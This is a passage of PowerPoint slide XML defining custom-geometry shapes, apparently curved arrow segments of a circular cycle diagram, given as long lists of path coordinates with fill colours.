            <a:chOff x="5999988" y="3997452"/>
            <a:chExt cx="3695700" cy="3683635"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6611112" y="6822948"/>
              <a:ext cx="2447925" cy="858519"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2447925" h="858520">
                  <a:moveTo>
                    <a:pt x="228854" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="226059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35692" y="260352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72209" y="293499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109528" y="325494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147625" y="356329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186476" y="385994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226058" y="414483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266347" y="441786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307319" y="467896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348951" y="492805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391219" y="516504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434100" y="538986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477570" y="560241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521604" y="580263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566181" y="599042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611275" y="616571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656864" y="632841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702924" y="647845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749430" y="661574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="796360" y="674020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="843691" y="685175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891397" y="695030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="939456" y="703579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="987843" y="710811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036537" y="716720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085512" y="721297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134745" y="724535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224661" y="858011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312799" y="724535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362221" y="721297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1411356" y="716720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1460181" y="710811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1508675" y="703579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1556815" y="695030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604581" y="685175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651949" y="674020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1698899" y="661574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1745409" y="647845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791456" y="632841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1837019" y="616571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1882076" y="599042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926605" y="580263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1970585" y="560241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2013994" y="538986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2056809" y="516504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099010" y="492805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2140573" y="467896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2181479" y="441786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2221703" y="414483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231156" y="407669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224661" y="407669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1173406" y="406776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1122468" y="404106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071885" y="399673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021694" y="393492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971935" y="385578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922645" y="375945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873862" y="364609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825624" y="351583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777969" y="336882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730935" y="320520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684561" y="302513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638885" y="282876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593943" y="261621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549776" y="238765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506420" y="214321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463914" y="188305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422296" y="160731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381603" y="131613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341875" y="100967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303148" y="68806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265462" y="35145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228854" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2447925" h="858520">
                  <a:moveTo>
                    <a:pt x="2220595" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2183750" y="35145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2145870" y="68806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2106992" y="100967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2067149" y="131613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026375" y="160731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984707" y="188305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942179" y="214321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898824" y="238765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1854679" y="261621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809779" y="282876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764156" y="302513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1717848" y="320520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670888" y="336882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1623311" y="351583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575152" y="364609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526445" y="375945"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1477226" y="385578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427529" y="393492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377390" y="399673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326842" y="404106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1275920" y="406776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1224661" y="407669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231156" y="407669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2300025" y="356329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2338078" y="325494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375363" y="293499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2411859" y="260352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2447544" y="226059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220595" y="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831580" y="4628388"/>
              <a:ext cx="864235" cy="2421890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="864234" h="2421890">
                  <a:moveTo>
                    <a:pt x="226314" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="224536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33536" y="258954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65646" y="294225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96329" y="330312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125584" y="367176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153412" y="404780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179814" y="443088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204788" y="482063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228335" y="521667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250455" y="561863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271148" y="602613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290414" y="643882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308252" y="685631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324664" y="727823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339648" y="770422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353206" y="813390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365336" y="856690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376039" y="900284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385316" y="944137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393165" y="988209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399586" y="1032465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404581" y="1076868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408149" y="1121379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410290" y="1165962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411003" y="1210579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410290" y="1255195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408149" y="1299770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404581" y="1344269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399586" y="1388654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393165" y="1432887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385316" y="1476933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376039" y="1520753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365336" y="1564310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353206" y="1607568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339648" y="1650489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324664" y="1693035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308252" y="1735171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290414" y="1776858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271148" y="1818059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250455" y="1858738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228335" y="1898857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204788" y="1938379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179814" y="1977267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153412" y="2015483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125584" y="2052991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96329" y="2089753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65646" y="2125733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33536" y="2160892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2195195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226314" y="2421636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262292" y="2384884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297037" y="2347251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330538" y="2308762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362783" y="2269444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393760" y="2229323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423459" y="2188426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451867" y="2146779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478973" y="2104408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504766" y="2061340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529234" y="2017601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552366" y="1973217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574150" y="1928216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594575" y="1882623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613629" y="1836464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631301" y="1789767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647580" y="1742557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662454" y="1694861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675911" y="1646705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687940" y="1598115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698530" y="1549119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707669" y="1499742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715346" y="1450011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721549" y="1399952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726266" y="1349591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729488" y="1298956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="1209928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729488" y="1122679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726266" y="1071833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721549" y="1021296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715346" y="971093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707669" y="921248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698530" y="871784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687940" y="822727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675911" y="774101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="662454" y="725929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647580" y="678235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631301" y="631045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613629" y="584382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="594575" y="538271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574150" y="492734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552366" y="447798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529234" y="403486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504766" y="359821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478973" y="316829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451867" y="274534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423459" y="232959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393760" y="192129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362783" y="152068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330538" y="112801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297037" y="74351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262292" y="36742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226314" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E3B3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637020" y="3997452"/>
              <a:ext cx="2446020" cy="855344"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2446020" h="855345">
                  <a:moveTo>
                    <a:pt x="1223899" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1133982" y="133223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1082831" y="136406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1031957" y="141071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="981390" y="147207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931155" y="154802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="881278" y="163845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831786" y="174324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="782707" y="186227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="734066" y="199544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685890" y="214263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638205" y="230372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591039" y="247861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544417" y="266716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498367" y="286928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452914" y="308484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408086" y="331373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363909" y="355584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320410" y="381105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277615" y="407924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235550" y="436031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194243" y="465414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153720" y="496061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114008" y="527961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75133" y="561102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37121" y="595473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="631063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228726" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265317" y="820101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302983" y="786700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341689" y="754778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381395" y="724349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422064" y="695428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463657" y="668033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506137" y="642177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549466" y="617877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="593606" y="595148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638518" y="574006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684164" y="554466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730508" y="536543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777510" y="520254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825133" y="505613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873338" y="492637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922088" y="481340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971345" y="471739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021070" y="463849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1071226" y="457685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1121775" y="453263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172678" y="450598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223899" y="449707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2229913" y="449707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2210719" y="436031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168727" y="407924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2126007" y="381105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2082584" y="355584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038482" y="331373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1993725" y="308484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1948337" y="286928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1902344" y="266716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855769" y="247861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808637" y="230372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1760972" y="214263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712799" y="199544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1664142" y="186227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615025" y="174324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1565473" y="163845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515510" y="154802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465160" y="147207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414448" y="141071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1363399" y="136406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1312036" y="133223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223899" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2446020" h="855345">
                  <a:moveTo>
                    <a:pt x="2229913" y="449707"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1223899" y="449707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1275124" y="450598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326011" y="453263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376524" y="457685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1426630" y="463849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1476292" y="471739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1525478" y="481340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1574151" y="492637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1622278" y="505613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1669823" y="520254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716752" y="536543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1763029" y="554466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1808622" y="574006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1853493" y="595148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1897610" y="617877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940937" y="642177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1983440" y="668033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2025083" y="695428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2065833" y="724349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2105654" y="754778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2144511" y="786700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182371" y="820101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2219198" y="854963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2446020" y="631063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2408907" y="595473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2370920" y="561102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2332083" y="527961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2292421" y="496061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2251958" y="465414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2229913" y="449707"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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999988" y="4628388"/>
              <a:ext cx="866140" cy="2421890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="866140" h="2421890">
                  <a:moveTo>
                    <a:pt x="637539" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="601585" y="36742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566880" y="74351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533433" y="112801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501253" y="152068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470351" y="192129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440734" y="232959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412413" y="274534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385396" y="316829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359692" y="359821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335312" y="403486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312264" y="447798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290557" y="492734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270200" y="538271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251204" y="584382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233576" y="631045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217326" y="678235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202464" y="725929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188999" y="774101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176939" y="822727"/>
                  </a:lnTo>
                  <a:lnTo>
